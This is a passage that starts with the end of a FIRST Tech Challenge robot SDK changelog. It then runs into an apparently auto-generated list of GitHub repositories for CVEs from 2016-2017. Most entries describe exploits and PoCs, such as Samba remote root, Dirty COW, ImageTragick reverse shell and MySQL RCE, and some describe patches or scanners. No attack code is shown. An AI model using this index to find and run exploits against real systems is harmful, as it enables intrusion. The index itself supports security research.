ultrasonic sensor. support for IrSeeker. support for LED. support for color sensor. support for CRServo prompt user to configure robot before using programming mode. Provides ability to disable audio cues. various bug fixes and improvements. Version 2.00 (released on 16.08.19) This is the new release for the upcoming 2016-2017 FIRST Tech Challenge Season. Channel change is enabled in the FTC Robot Controller app for Moto G 2nd and 3rd Gen phones. Users can now use annotations to register/disable their Op Modes. Changes in the Android SDK, JDK and build tool requirements (minsdk=19, java 1.7, build tools 23.0.3). Standardized units in analog input. Cleaned up code for existing analog sensor classes. setChannelMode and getChannelMode were REMOVED from the DcMotorController class. This is important - we no longer set the motor modes through the motor controller. setMode and getMode were added to the DcMotor class. ContinuousRotationServo class has been added to the FTC SDK. Range.clip() method has been overloaded so it can support this operation for int, short and byte integers. Some changes have been made (new methods added) on how a user can access items from the hardware map. Users can now set the zero power behavior for a DC motor so that the motor will brake or float when power is zero. Prototype Blockly Programming Mode has been added to FTC Robot Controller. Users can place the Robot Controller into this mode, and then use a device (such as a laptop) that has a Javascript enabled browser to write Blockly-based Op Modes directly onto the Robot Controller. Users can now configure the robot remotely through the FTC Driver Station app. Android Studio project supports Android Studio 2.1.x and compile SDK Version 23 (Marshmallow). Vuforia Computer Vision SDK integrated into FTC SDK. Users can use sample vision targets to get localization information on a standard FTC field. Project structure has been reorganized so that there is now a TeamCode package that users can use to place their local/custom Op Modes into this package. Inspection function has been integrated into the FTC Robot Controller and Driver Station Apps (Thanks Team HazMat… 9277 & 10650!). Audio cues have been incorporated into FTC SDK. Swap mechanism added to FTC Robot Controller configuration activity. For example, if you have two motor controllers on a robot, and you misidentified them in your configuration file, you can use the Swap button to swap the devices within the configuration file (so you do not have to manually re-enter in the configuration info for the two devices). Fix mechanism added to all user to replace an electronic module easily. For example, suppose a servo controller dies on your robot. You replace the broken module with a new module, which has a different serial number from the original servo controller. You can use the Fix button to automatically reconfigure your configuration file to use the serial number of the new module. Improvements made to fix resiliency and responsiveness of the system. For LinearOpMode the user now must for a telemetry.update() to update the telemetry data on the driver station. This update() mechanism ensures that the driver station gets the updated data properly and at the same time. The Auto Configure function of the Robot Controller is now template based. If there is a commonly used robot configuration, a template can be created so that the Auto Configure mechanism can be used to quickly configure a robot of this type. The logic to detect a runaway op mode (both in the LinearOpMode and OpMode types) and to abort the run, then auto recover has been improved/implemented. Fix has been incorporated so that Logitech F310 gamepad mappings will be correct for Marshmallow users. Release 16.07.08 For the ftc_app project, the gradle files have been modified to support Android Studio 2.1.x. Release 16.03.30 For the MIT App Inventor, the design blocks have new icons that better represent the function of each design component. Some changes were made to the shutdown logic to ensure the robust shutdown of some of our USB services. A change was made to LinearOpMode so as to allow a given instance to be executed more than once, which is required for the App Inventor. Javadoc improved/updated. Release 16.03.09 Changes made to make the FTC SDK synchronous (significant change!) waitOneFullHardwareCycle() and waitForNextHardwareCycle() are no longer needed and have been deprecated. runOpMode() (for a LinearOpMode) is now decoupled from the system's hardware read/write thread. loop() (for an OpMode) is now decoupled from the system's hardware read/write thread. Methods are synchronous. For example, if you call setMode(DcMotorController.RunMode.RESET_ENCODERS) for a motor, the encoder is guaranteed to be reset when the method call is complete. For legacy module (NXT compatible), user no longer has to toggle between read and write modes when reading from or writing to a legacy device. Changes made to enhance reliability/robustness during ESD event. Changes made to make code thread safe. Debug keystore added so that user-generated robot controller APKs will all use the same signed key (to avoid conflicts if a team has multiple developer laptops for example). Firmware version information for Modern Robotics modules are now logged. Changes made to improve USB comm reliability and robustness. Added support for voltage indicator for legacy (NXT-compatible) motor controllers. Changes made to provide auto stop capabilities for op modes. A LinearOpMode class will stop when the statements in runOpMode() are complete. User does not have to push the stop button on the driver station. If an op mode is stopped by the driver station, but there is a run away/uninterruptible thread persisting, the app will log an error message then force itself to crash to stop the runaway thread. Driver Station UI modified to display lowest measured voltage below current voltage (12V battery). Driver Station UI modified to have color background for current voltage (green=good, yellow=caution, red=danger, extremely low voltage). javadoc improved (edits and additional classes). Added app build time to About activity for driver station and robot controller apps. Display local IP addresses on Driver Station About activity. Added I2cDeviceSynchImpl. Added I2cDeviceSync interface. Added seconds() and milliseconds() to ElapsedTime for clarity. Added getCallbackCount() to I2cDevice. Added missing clearI2cPortActionFlag. Added code to create log messages while waiting for LinearOpMode shutdown. Fix so Wifi Direct Config activity will no longer launch multiple times. Added the ability to specify an alternate i2c address in software for the Modern Robotics gyro. Release 16.02.09 Improved battery checker feature so that voltage values get refreshed regularly (every 250 msec) on Driver Station (DS) user interface. Improved software so that Robot Controller (RC) is much more resilient and “self-healing” to USB disconnects: If user attempts to start/restart RC with one or more module missing, it will display a warning but still start up. When running an op mode, if one or more modules gets disconnected, the RC & DS will display warnings,and robot will keep on working in spite of the missing module(s). If a disconnected module gets physically reconnected the RC will auto detect the module and the user will regain control of the recently connected module. Warning messages are more helpful (identifies the type of module that’s missing plus its USB serial number). Code changes to fix the null gamepad reference when users try to reference the gamepads in the init() portion of their op mode. NXT light sensor output is now properly scaled. Note that teams might have to readjust their light threshold values in their op modes. On DS user interface, gamepad icon for a driver will disappear if the matching gamepad is disconnected or if that gamepad gets designated as a different driver. Robot Protocol (ROBOCOL) version number info is displayed in About screen on RC and DS apps. Incorporated a display filter on pairing screen to filter out devices that don’t use the “-“ format. This filter can be turned off to show all WiFi Direct devices. Updated text in License file. Fixed formatting error in OpticalDistanceSensor.toString(). Fixed issue on with a blank (“”) device name that would disrupt WiFi Direct Pairing. Made a change so that the WiFi info and battery info can be displayed more quickly on the DS upon connecting to RC. Improved javadoc generation. Modified code to make it easier to support language localization in the future. Release 16.01.04 Updated compileSdkVersion for apps Prevent Wifi from entering power saving mode removed unused import from driver station Corrrected "Dead zone" joystick code. LED.getDeviceName and .getConnectionInfo() return null apps check for ROBOCOL_VERSION mismatch Fix for Telemetry also has off-by-one errors in its data string sizing / short size limitations error User telemetry output is sorted. added formatting variants to DbgLog and RobotLog APIs code modified to allow for a long list of op mode names. changes to improve thread safety of RobocolDatagramSocket Fix for "missing hardware leaves robot controller disconnected from driver station" error fix for "fast tapping of Init/Start causes problems" (toast is now only instantiated on UI thread). added some log statements for thread life cycle. moved gamepad reset logic inside of initActiveOpMode() for robustness changes made to mitigate risk of race conditions on public methods. changes to try and flag when WiFi Direct name contains non-printable characters. fix to correct race condition between .run() and .close() in ReadWriteRunnableStandard. updated FTDI driver made ReadWriteRunnableStanard interface public. fixed off-by-one errors in Command constructor moved specific hardware implmentations into their own package. moved specific gamepad implemnatations to the hardware library. changed LICENSE file to new BSD version. fixed race condition when shutting down Modern Robotics USB devices. methods in the ColorSensor classes have been synchronized. corrected isBusy() status to reflect end of motion. corrected "back" button keycode. the notSupported() method of the GyroSensor class was changed to protected (it should not be public). Release 15.11.04.001 Added Support for Modern Robotics Gyro. The GyroSensor class now supports the MR Gyro Sensor. Users can access heading data (about Z axis) Users can also access raw gyro data (X, Y, & Z axes). Example MRGyroTest.java op mode included. Improved error messages More descriptive error messages for exceptions in user code. Updated DcMotor API Enable read mode on new address in setI2cAddress Fix so that driver station app resets the gamepads when switching op modes. USB-related code changes to make USB comm more responsive and to display more explicit error messages. Fix so that USB will recover properly if the USB bus returns garbage data. Fix USB initializtion race condition. Better error reporting during FTDI open. More explicit messages during USB failures. Fixed bug so that USB device is closed if event loop teardown method was not called. Fixed timer UI issue Fixed duplicate name UI bug (Legacy Module configuration). Fixed race condition in EventLoopManager. Fix to keep references stable when updating gamepad. For legacy Matrix motor/servo controllers removed necessity of appending "Motor" and "Servo" to controller names. Updated HT color sensor driver to use constants from ModernRoboticsUsbLegacyModule class. Updated MR color sensor driver to use constants from ModernRoboticsUsbDeviceInterfaceModule class. Correctly handle I2C Address change in all color sensors Updated/cleaned up op modes. Updated comments in LinearI2cAddressChange.java example op mode. Replaced the calls to "setChannelMode" with "setMode" (to match the new of the DcMotor method). Removed K9AutoTime.java op mode. Added MRGyroTest.java op mode (demonstrates how to use MR Gyro Sensor). Added MRRGBExample.java op mode (demonstrates how to use MR Color Sensor). Added HTRGBExample.java op mode (demonstrates how to use HT legacy color sensor). Added MatrixControllerDemo.java (demonstrates how to use legacy Matrix controller). Updated javadoc documentation. Updated release .apk files for Robot Controller and Driver Station apps. Release 15.10.06.002 Added support for Legacy Matrix 9.6V motor/servo controller. Cleaned up build.gradle file. Minor UI and bug fixes for driver station and robot controller apps. Throws error if Ultrasonic sensor (NXT) is not configured for legacy module port 4 or 5. Release 15.08.03.001 New user interfaces for FTC Driver Station and FTC Robot Controller apps. An init() method is added to the OpMode class. For this release, init() is triggered right before the start() method. Eventually, the init() method will be triggered when the user presses an "INIT" button on driver station. The init() and loop() methods are now required (i.e., need to be overridden in the user's op mode). The start() and stop() methods are optional. A new LinearOpMode class is introduced. Teams can use the LinearOpMode mode to create a linear (not event driven) program model. Teams can use blocking statements like Thread.sleep() within a linear op mode. The API for the Legacy Module and Core Device Interface Module have been updated. Support for encoders with the Legacy Module is now working. The hardware loop has been updated for better performance.** : [chrisneagu/FTC-SKYSTONE-TEAM-DARK-ANGELS-ROMANIA-2020](https://api.github.com/repos/chrisneagu/FTC-SKYSTONE-TEAM-DARK-ANGELS-ROMANIA-2020) create time: 2021-03-08T11:34:11Z

**Remote root exploit for the SAMBA CVE-2017-7494 vulnerability** : [joxeankoret/CVE-2017-7494](https://api.github.com/repos/joxeankoret/CVE-2017-7494) create time: 2017-06-05T16:25:57Z

**The sample CVE-ID 2017-2020 in VRM paper** : [vidaAhmadi/sample-CVE](https://api.github.com/repos/vidaAhmadi/sample-CVE) create time: 2021-02-28T20:53:14Z

**OptionsBleed (CVE-2017-9798) PoC / Scanner** : [brokensound77/OptionsBleed-POC-Scanner](https://api.github.com/repos/brokensound77/OptionsBleed-POC-Scanner) create time: 2017-09-27T03:28:22Z

**Jquery File Tree 1.6.6 Path Traversal exploit (CVE-2017-1000170)** : [Nickguitar/Jquery-File-Tree-1.6.6-Path-Traversal](https://api.github.com/repos/Nickguitar/Jquery-File-Tree-1.6.6-Path-Traversal) create time: 2021-03-19T12:39:10Z

**None** : [EEsshq/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution](https://api.github.com/repos/EEsshq/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution) create time: 2021-03-22T09:33:51Z

**CVE-2017-0100、MS17-012、Eop** : [cssxn/CVE-2017-0100](https://api.github.com/repos/cssxn/CVE-2017-0100) create time: 2021-03-24T09:21:09Z

**CVE2019-2017 POC** : [grmono/CVE2019-2017_POC](https://api.github.com/repos/grmono/CVE2019-2017_POC) create time: 2019-08-27T20:14:45Z

**None** : [ari5ti/Janus-Vulnerability-CVE-2017-13156-Exploit-with-POC](https://api.github.com/repos/ari5ti/Janus-Vulnerability-CVE-2017-13156-Exploit-with-POC) create time: 2021-03-22T08:27:10Z

**None** : [Ethan-Chen-uwo/A-breif-introduction-of-CVE-2017-16541](https://api.github.com/repos/Ethan-Chen-uwo/A-breif-introduction-of-CVE-2017-16541) create time: 2021-03-29T09:52:11Z

**CVE-2017-7529** : [Moazj8/Nginx-Remote-Integer-Overflow-Vulnerability](https://api.github.com/repos/Moazj8/Nginx-Remote-Integer-Overflow-Vulnerability) create time: 2021-03-31T15:24:07Z

**A Remote Code Execution (RCE) exploit for Huawei HG532d based on CVE-2017-17215 vulnerability. Modded from original PoC code from exploit-db.com** : [wilfred-wulbou/HG532d-RCE-Exploit](https://api.github.com/repos/wilfred-wulbou/HG532d-RCE-Exploit) create time: 2020-11-17T11:22:20Z

**Anaysis cve-2017-11176 / mq_notify issue** : [applemasterz17/CVE-2017-11176](https://api.github.com/repos/applemasterz17/CVE-2017-11176) create time: 2020-09-15T05:01:34Z

**None** : [dock0d1/Apache-Struts-2-CVE-2017-5638-Exploit](https://api.github.com/repos/dock0d1/Apache-Struts-2-CVE-2017-5638-Exploit) create time: 2021-03-09T12:56:08Z

**CVE-2017-9805-Exploit** : [0xd3vil/CVE-2017-9805-Exploit](https://api.github.com/repos/0xd3vil/CVE-2017-9805-Exploit) create time: 2021-04-04T04:35:19Z

**None** : [idl3r/cve-2016-0728](https://api.github.com/repos/idl3r/cve-2016-0728) create time: 2016-01-19T12:55:49Z

**cve_2016_0728** : [isnuryusuf/cve_2016_0728](https://api.github.com/repos/isnuryusuf/cve_2016_0728) create time: 2016-01-20T12:22:07Z

**CVE-2016-0728 Linux Kernel Vulnerability** : [kennetham/cve_2016_0728](https://api.github.com/repos/kennetham/cve_2016_0728) create time: 2016-01-20T15:23:52Z

**3.8+ linux root exploit** : [bjzz/cve_2016_0728_exploit](https://api.github.com/repos/bjzz/cve_2016_0728_exploit) create time: 2016-05-11T02:33:41Z

**None** : [googleweb/CVE-2016-0728](https://api.github.com/repos/googleweb/CVE-2016-0728) create time: 2016-01-23T09:17:21Z

**None** : [sunnyjiang/cve_2016_0728](https://api.github.com/repos/sunnyjiang/cve_2016_0728) create time: 2016-01-21T08:37:42Z

**just testing the flaw.** : [mfer/cve_2016_0728](https://api.github.com/repos/mfer/cve_2016_0728) create time: 2016-01-21T11:26:42Z

**None** : [fochess/cve_2016_0728](https://api.github.com/repos/fochess/cve_2016_0728) create time: 2016-01-22T03:13:57Z

**None** : [forced-request/rails-rce-cve-2016-0752](https://api.github.com/repos/forced-request/rails-rce-cve-2016-0752) create time: 2016-01-26T15:25:34Z

**A testbed for CVE-2016-0728, a refcount leak/overflow bug in Linux** : [neuschaefer/cve-2016-0728-testbed](https://api.github.com/repos/neuschaefer/cve-2016-0728-testbed) create time: 2016-01-28T22:38:13Z

**CVE-2016-1287 vulnerability test** : [jgajek/killasa](https://api.github.com/repos/jgajek/killasa) create time: 2016-02-15T04:56:15Z

**None** : [luanjampa/cve-2016-0701](https://api.github.com/repos/luanjampa/cve-2016-0701) create time: 2016-02-02T22:53:34Z

**Proof of concept showing how CVE-2016-2098 leads to remote code execution** : [hderms/dh-CVE_2016_2098](https://api.github.com/repos/hderms/dh-CVE_2016_2098) create time: 2016-03-01T17:45:29Z

**a exploit for cve-2016-0728** : [bittorrent3389/cve-2016-0728](https://api.github.com/repos/bittorrent3389/cve-2016-0728) create time: 2016-03-15T04:52:40Z

**None** : [dachidahu/CVE-2016-0752](https://api.github.com/repos/dachidahu/CVE-2016-0752) create time: 2016-03-18T21:10:18Z

**Simple script for testing CVE-2016-2402 and similar flaws** : [ikoz/cert-pinning-flaw-poc](https://api.github.com/repos/ikoz/cert-pinning-flaw-poc) create time: 2016-03-20T18:04:40Z

**OkHttp sample app vulnerable to CVE-2016-2402** : [ikoz/certPinningVulnerableOkHttp](https://api.github.com/repos/ikoz/certPinningVulnerableOkHttp) create time: 2016-03-30T23:45:06Z

**None** : [hulovebin/cve-2016-0805](https://api.github.com/repos/hulovebin/cve-2016-0805) create time: 2016-04-06T00:59:43Z

**arbitrary memory read/write by IMemroy OOB** : [secmob/CVE-2016-0846](https://api.github.com/repos/secmob/CVE-2016-0846) create time: 2016-04-08T05:09:15Z

**Extraction of iMessage Data via XSS** : [moloch--/cve-2016-1764](https://api.github.com/repos/moloch--/cve-2016-1764) create time: 2016-04-08T15:45:44Z

**None** : [b0b0505/CVE-2016-0846-PoC](https://api.github.com/repos/b0b0505/CVE-2016-0846-PoC) create time: 2016-04-19T12:56:44Z

**An example detection and remediation policy.** : [nickanderson/cfengine-CVE-2016-2118](https://api.github.com/repos/nickanderson/cfengine-CVE-2016-2118) create time: 2016-04-17T22:22:04Z

**CVE-2016-3141** : [peternguyen93/CVE-2016-3141](https://api.github.com/repos/peternguyen93/CVE-2016-3141) create time: 2016-04-21T08:59:05Z

**Exploit code for CVE-2016-1757** : [gdbinit/mach_race](https://api.github.com/repos/gdbinit/mach_race) create time: 2016-04-27T12:29:28Z

**a puppet module in response to CVE-2016-3714** : [jackdpeterson/imagick_secure_puppet](https://api.github.com/repos/jackdpeterson/imagick_secure_puppet) create time: 2016-05-04T04:30:25Z

**None** : [tommiionfire/CVE-2016-3714](https://api.github.com/repos/tommiionfire/CVE-2016-3714) create time: 2016-05-04T09:47:42Z

**ImaegMagick Code Execution (CVE-2016-3714)** : [Hood3dRob1n/CVE-2016-3714](https://api.github.com/repos/Hood3dRob1n/CVE-2016-3714) create time: 2016-05-07T08:21:27Z

**EoP (Win7) & BSoD (Win10) PoC for CVE-2016-0051 (MS-016)** : [koczkatamas/CVE-2016-0051](https://api.github.com/repos/koczkatamas/CVE-2016-0051) create time: 2016-02-09T21:30:34Z

**None** : [hexx0r/CVE-2016-0051](https://api.github.com/repos/hexx0r/CVE-2016-0051) create time: 2016-05-08T06:22:07Z

**Fix ImageMagick Command Injection (CVE-2016-3714) with Ansible.** : [chusiang/CVE-2016-3714.ansible.role](https://api.github.com/repos/chusiang/CVE-2016-3714.ansible.role) create time: 2016-05-05T11:05:20Z

**None** : [abdsec/CVE-2016-0801](https://api.github.com/repos/abdsec/CVE-2016-0801) create time: 2016-05-11T04:36:45Z

**Analysis of CVE-2016-3959 and a Proof of Concept Attack Against a Go SSH Server. ** : [alexmullins/dsa](https://api.github.com/repos/alexmullins/dsa) create time: 2016-04-10T01:35:27Z

**Test modified buggy poc** : [zsaurus/CVE-2016-0801-test](https://api.github.com/repos/zsaurus/CVE-2016-0801-test) create time: 2016-05-15T03:55:27Z

**Local privilege escalation for OS X 10.10.5 via CVE-2016-1828.** : [bazad/rootsh](https://api.github.com/repos/bazad/rootsh) create time: 2016-05-18T03:49:02Z

**POC for CVE 2016-0752** : [julianmunoz/Rails-Dynamic-Render-vuln](https://api.github.com/repos/julianmunoz/Rails-Dynamic-Render-vuln) create time: 2016-04-17T00:08:23Z

**Proof of Concepts for CVE-2016–3714** : [ImageTragick/PoCs](https://api.github.com/repos/ImageTragick/PoCs) create time: 2016-05-03T05:43:08Z

**Magento Unauthorized Remote Code Execution (CVE-2016-4010)** : [brianwrf/Magento-CVE-2016-4010](https://api.github.com/repos/brianwrf/Magento-CVE-2016-4010) create time: 2016-05-25T07:52:28Z

**None** : [jpeanut/ImageTragick-CVE-2016-3714-RShell](https://api.github.com/repos/jpeanut/ImageTragick-CVE-2016-3714-RShell) create time: 2016-05-05T18:16:52Z

**None** : [Manouchehri/CVE-2016-1734](https://api.github.com/repos/Manouchehri/CVE-2016-1734) create time: 2016-06-03T05:37:06Z

**A PoC of CVE-2016-2098 (rails4.2.5.1 / view render)** : [CyberDefenseInstitute/PoC_CVE-2016-2098_Rails42](https://api.github.com/repos/CyberDefenseInstitute/PoC_CVE-2016-2098_Rails42) create time: 2016-06-07T12:59:31Z

**Docker container implementing tests for CVE-2016-2107 - LuckyNegative20** : [tmiklas/docker-cve-2016-2107](https://api.github.com/repos/tmiklas/docker-cve-2016-2107) create time: 2016-06-09T16:01:03Z

**Qualcomm TrustZone kernel privilege escalation** : [laginimaineb/cve-2016-2431](https://api.github.com/repos/laginimaineb/cve-2016-2431) create time: 2016-06-15T11:21:24Z

**None** : [jason3e7/CVE-2016-4438](https://api.github.com/repos/jason3e7/CVE-2016-4438) create time: 2016-06-16T06:28:55Z

**CVE-2016-0051 样本库** : [ganrann/CVE-2016-0051](https://api.github.com/repos/ganrann/CVE-2016-0051) create time: 2016-06-16T14:08:43Z

**Proof-of-Concept exploit for CVE-2016-0189 (VBScript Memory Corruption in IE11)** : [theori-io/cve-2016-0189](https://api.github.com/repos/theori-io/cve-2016-0189) create time: 2016-06-22T23:03:30Z

**CVE-2016-4971 written in nodejs** : [gitcollect/CVE-2016-4971](https://api.github.com/repos/gitcollect/CVE-2016-4971) create time: 2016-07-02T14:44:48Z

**CVE-2016-4971 written in nodejs** : [BlueCocoa/CVE-2016-4971](https://api.github.com/repos/BlueCocoa/CVE-2016-4971) create time: 2016-06-24T21:59:33Z

**对CVE-2016-0189漏洞补丁的分析** : [deamwork/MS16-051-poc](https://api.github.com/repos/deamwork/MS16-051-poc) create time: 2016-06-25T01:48:38Z

**PoC code of CVE-2016-5699 Vulnerability** : [bunseokbot/CVE-2016-5699-poc](https://api.github.com/repos/bunseokbot/CVE-2016-5699-poc) create time: 2016-06-23T14:01:20Z

**Exploit that extracts Qualcomm's KeyMaster keys using CVE-2015-6639 and CVE-2016-2431** : [laginimaineb/ExtractKeyMaster](https://api.github.com/repos/laginimaineb/ExtractKeyMaster) create time: 2016-06-30T11:56:44Z

**Buildable Poc of CVE-2016-2468 based on http://retme.net/index.php/2016/06/12/CVE-2016-2468.html** : [gitcollect/CVE-2016-2468](https://api.github.com/repos/gitcollect/CVE-2016-2468) create time: 2016-07-02T14:37:31Z

**None** : [jianqiangzhao/CVE-2016-2434](https://api.github.com/repos/jianqiangzhao/CVE-2016-2434) create time: 2016-07-05T10:46:34Z

**Exploiting CVE-2016-0040 uninitialized pointer** : [Rootkitsmm-zz/cve-2016-0040](https://api.github.com/repos/Rootkitsmm-zz/cve-2016-0040) create time: 2016-02-26T18:00:30Z

**CVE-2016-3962-Exploit** : [securifera/CVE-2016-3962-Exploit](https://api.github.com/repos/securifera/CVE-2016-3962-Exploit) create time: 2016-07-17T18:43:56Z

**None** : [KosukeShimofuji/CVE-2016-5734](https://api.github.com/repos/KosukeShimofuji/CVE-2016-5734) create time: 2016-07-08T09:43:26Z

**Disables ImageIO TIFF support to protect against CVE-2016-4631** : [hansnielsen/tiffdisabler](https://api.github.com/repos/hansnielsen/tiffdisabler) create time: 2016-07-20T06:47:07Z

**Attempts to leverage CVE 2016-6210 to enumerate valid users on a given OpenSSH server. All credit to Eddie Harari on the list for disclosure and initial PoC - I'm just making it work in cases where you have a bunch (dozens/hundreds) of servers to test ASAP.** : [bassitone/OpenSSH-User-Enumeration](https://api.github.com/repos/bassitone/OpenSSH-User-Enumeration) create time: 2016-07-19T16:53:17Z

**OpenSSHD 7.2p2 - User Enumeration: CVE 2016-6210** : [calebshortt/opensshd_user_enumeration](https://api.github.com/repos/calebshortt/opensshd_user_enumeration) create time: 2016-08-03T16:13:31Z

**Proof of concept for CSRF vulnerability(CVE-2016-4825) on IO-DATA Recording Hard Disc Drive** : [kaito834/cve-2016-4845_csrf](https://api.github.com/repos/kaito834/cve-2016-4845_csrf) create time: 2016-08-21T07:32:19Z

**A PoC demonstrating techniques exploiting CVE-2016-5696 Off-Path TCP Exploits: Global Rate Limit Considered Dangerous ** : [Gnoxter/mountain_goat](https://api.github.com/repos/Gnoxter/mountain_goat) create time: 2016-08-20T23:28:41Z

**Proof of Concept code for CVE-2016-5696** : [violentshell/rover](https://api.github.com/repos/violentshell/rover) create time: 2016-08-21T00:17:20Z

**Reading Course Report** : [shajinzheng/cve-2016-5699-jinzheng-sha](https://api.github.com/repos/shajinzheng/cve-2016-5699-jinzheng-sha) create time: 2016-08-23T03:06:22Z

**Daemon to randomize tcp_challenge_ack_limit to prevent side channel attacks CVE-2016-5696** : [bplinux/chackd](https://api.github.com/repos/bplinux/chackd) create time: 2016-08-26T16:11:03Z

**Proof-of-concept exploit code for CVE-2016-5696** : [jduck/challack](https://api.github.com/repos/jduck/challack) create time: 2016-08-23T00:21:18Z

**MySQL server CVE-2016-6662 patch playbook** : [konstantin-kelemen/mysqld_safe-CVE-2016-6662-patch](https://api.github.com/repos/konstantin-kelemen/mysqld_safe-CVE-2016-6662-patch) create time: 2016-09-14T13:12:21Z

**research CVE-2016-6662** : [KosukeShimofuji/CVE-2016-6662](https://api.github.com/repos/KosukeShimofuji/CVE-2016-6662) create time: 2016-09-16T04:21:19Z

**Use CVE-2016-3308 corrupt win32k desktop heap** : [55-AA/CVE-2016-3308](https://api.github.com/repos/55-AA/CVE-2016-3308) create time: 2016-09-18T03:48:53Z

**A PoC of KNOXout (CVE-2016-6584) - bypassing Samsung KNOX protections and root Samsung Galaxy S6 Android Device.** : [ViralSecurityGroup/KNOXout](https://api.github.com/repos/ViralSecurityGroup/KNOXout) create time: 2016-09-16T07:34:50Z

**Simple ansible playbook to patch mysql servers against CVE-2016-6662** : [meersjo/ansible-mysql-cve-2016-6662](https://api.github.com/repos/meersjo/ansible-mysql-cve-2016-6662) create time: 2016-09-15T15:12:32Z

**0ldSQL_MySQL_RCE_exploit.py (ver. 1.0) (CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit For testing purposes only. Do no harm.** : [Ashrafdev/MySQL-Remote-Root-Code-Execution](https://api.github.com/repos/Ashrafdev/MySQL-Remote-Root-Code-Execution) create time: 2016-09-20T08:03:40Z

**Research CVE-2016-4861** : [KosukeShimofuji/CVE-2016-4861](https://api.github.com/repos/KosukeShimofuji/CVE-2016-4861) create time: 2016-09-16T04:25:35Z

**None** : [KosukeShimofuji/CVE-2016-2776](https://api.github.com/repos/KosukeShimofuji/CVE-2016-2776) create time: 2016-09-28T10:07:24Z

**CVE-2016-2776** : [infobyte/CVE-2016-2776](https://api.github.com/repos/infobyte/CVE-2016-2776) create time: 2016-09-30T00:40:44Z

**OS X 10.11.6 LPE PoC for CVE-2016-4655 / CVE-2016-4656** : [jndok/PegasusX](https://api.github.com/repos/jndok/PegasusX) create time: 2016-10-02T12:42:14Z

**CVE-2016-7117** : [KosukeShimofuji/CVE-2016-7117](https://api.github.com/repos/KosukeShimofuji/CVE-2016-7117) create time: 2016-10-14T01:08:34Z

**Proof-of-Concept CVE-2016-0199** : [LeoonZHANG/CVE-2016-0199](https://api.github.com/repos/LeoonZHANG/CVE-2016-0199) create time: 2016-10-16T16:03:54Z

**Dirty Cow** : [KosukeShimofuji/CVE-2016-5195](https://api.github.com/repos/KosukeShimofuji/CVE-2016-5195) create time: 2016-10-21T05:30:17Z

**None** : [ASRTeam/CVE-2016-5195](https://api.github.com/repos/ASRTeam/CVE-2016-5195) create time: 2016-10-21T06:06:05Z

**Ansible playbook to mitigate CVE-2016-5195 on CentOS** : [istenrot/centos-dirty-cow-ansible](https://api.github.com/repos/istenrot/centos-dirty-cow-ansible) create time: 2016-10-21T20:32:05Z

**Mitigates CVE-2016-5195 aka DirtyCOW** : [pgporada/ansible-role-cve](https://api.github.com/repos/pgporada/ansible-role-cve) create time: 2016-10-22T00:00:01Z

**CVE-2016-5195 exploit written in Crystal** : [xlucas/dirtycow.cr](https://api.github.com/repos/xlucas/dirtycow.cr) create time: 2016-10-21T15:54:10Z

**Check the Browser's FlashPlayer version to check if it is vulnerable to exploit CVE-2016-7855** : [swagatbora90/CheckFlashPlayerVersion](https://api.github.com/repos/swagatbora90/CheckFlashPlayerVersion) create time: 2016-10-26T19:53:29Z

**PoC exploit for CVE-2016-4622** : [saelo/jscpwn](https://api.github.com/repos/saelo/jscpwn) create time: 2016-10-09T15:22:06Z

**Scan vuls kernel CVE-2016-5195 - DirtyCow** : [aishee/scan-dirtycow](https://api.github.com/repos/aishee/scan-dirtycow) create time: 2016-10-29T08:45:45Z

**Universal Android root tool based on CVE-2016-5195. Watch this space.** : [DavidBuchanan314/cowroot](https://api.github.com/repos/DavidBuchanan314/cowroot) create time: 2016-10-24T12:35:55Z

**Public repository for improvements to the EXTRABACON exploit** : [RiskSense-Ops/CVE-2016-6366](https://api.github.com/repos/RiskSense-Ops/CVE-2016-6366) create time: 2016-09-20T23:19:02Z

**None** : [firebroo/CVE-2016-6663](https://api.github.com/repos/firebroo/CVE-2016-6663) create time: 2016-11-02T02:05:45Z

**Source code: https://github.com/XiphosResearch/exploits/tree/master/Joomraa** : [sunsunza2009/Joomla-3.4.4-3.6.4_CVE-2016-8869_and_CVE-2016-8870](https://api.github.com/repos/sunsunza2009/Joomla-3.4.4-3.6.4_CVE-2016-8869_and_CVE-2016-8870) create time: 2016-11-02T14:35:58Z

**Schneider Electric Magelis HMI Resource Consumption Vulnerabilities [ICSA-16-308-02, CVE-2016-8367, CVE-2016-8374]** : [0xICF/PanelShock](https://api.github.com/repos/0xICF/PanelShock) create time: 2016-11-04T14:24:15Z

**Recent Linux privilege escalation exploit** : [ldenevi/CVE-2016-5195](https://api.github.com/repos/ldenevi/CVE-2016-5195) create time: 2016-11-06T14:38:04Z

**Exploit for Joomla 3.4.4 - 3.6.4 (CVE-2016-8869 and CVE-2016-8870)** : [rustyJ4ck/JoomlaCVE20168869](https://api.github.com/repos/rustyJ4ck/JoomlaCVE20168869) create time: 2016-11-10T13:47:01Z

**这里保留着部分脏牛漏洞的利用代码** : [whu-enjoy/CVE-2016-5195](https://api.github.com/repos/whu-enjoy/CVE-2016-5195) create time: 2016-11-17T02:20:09Z

**None** : [oleg-fiksel/ansible_CVE-2016-5195_check](https://api.github.com/repos/oleg-fiksel/ansible_CVE-2016-5195_check) create time: 2016-10-29T19:15:20Z

**None** : [shekkbuilder/CVE-2016-7434](https://api.github.com/repos/shekkbuilder/CVE-2016-7434) create time: 2016-11-27T01:14:20Z

**Full exploit of CVE-2016-6754(BadKernel) and slide of SyScan360 2016** : [secmob/BadKernel](https://api.github.com/repos/secmob/BadKernel) create time: 2016-11-28T08:44:44Z

**PoC for CVE-2016-8655 that causes a kernel panic** : [scarvell/cve-2016-8655](https://api.github.com/repos/scarvell/cve-2016-8655) create time: 2016-12-07T00:51:52Z

**CVE-2016-9079 exploit code as it appeared on https://lists.torproject.org/pipermail/tor-talk/2016-November/042639.html** : [LakshmiDesai/CVE-2016-9079](https://api.github.com/repos/LakshmiDesai/CVE-2016-9079) create time: 2017-02-08T07:41:37Z

**None** : [LakshmiDesai/CVE-2016-8655](https://api.github.com/repos/LakshmiDesai/CVE-2016-8655) create time: 2016-12-08T07:41:52Z

**Chocobo Root (CVE-2016-8655) Analysis** : [agkunkle/chocobo](https://api.github.com/repos/agkunkle/chocobo) create time: 2016-12-09T17:45:04Z

**Inspec profile for detecting CVE-2016-5195 aka Dirty COW** : [ndobson/inspec_CVE-2016-5195](https://api.github.com/repos/ndobson/inspec_CVE-2016-5195) create time: 2016-12-08T22:41:51Z

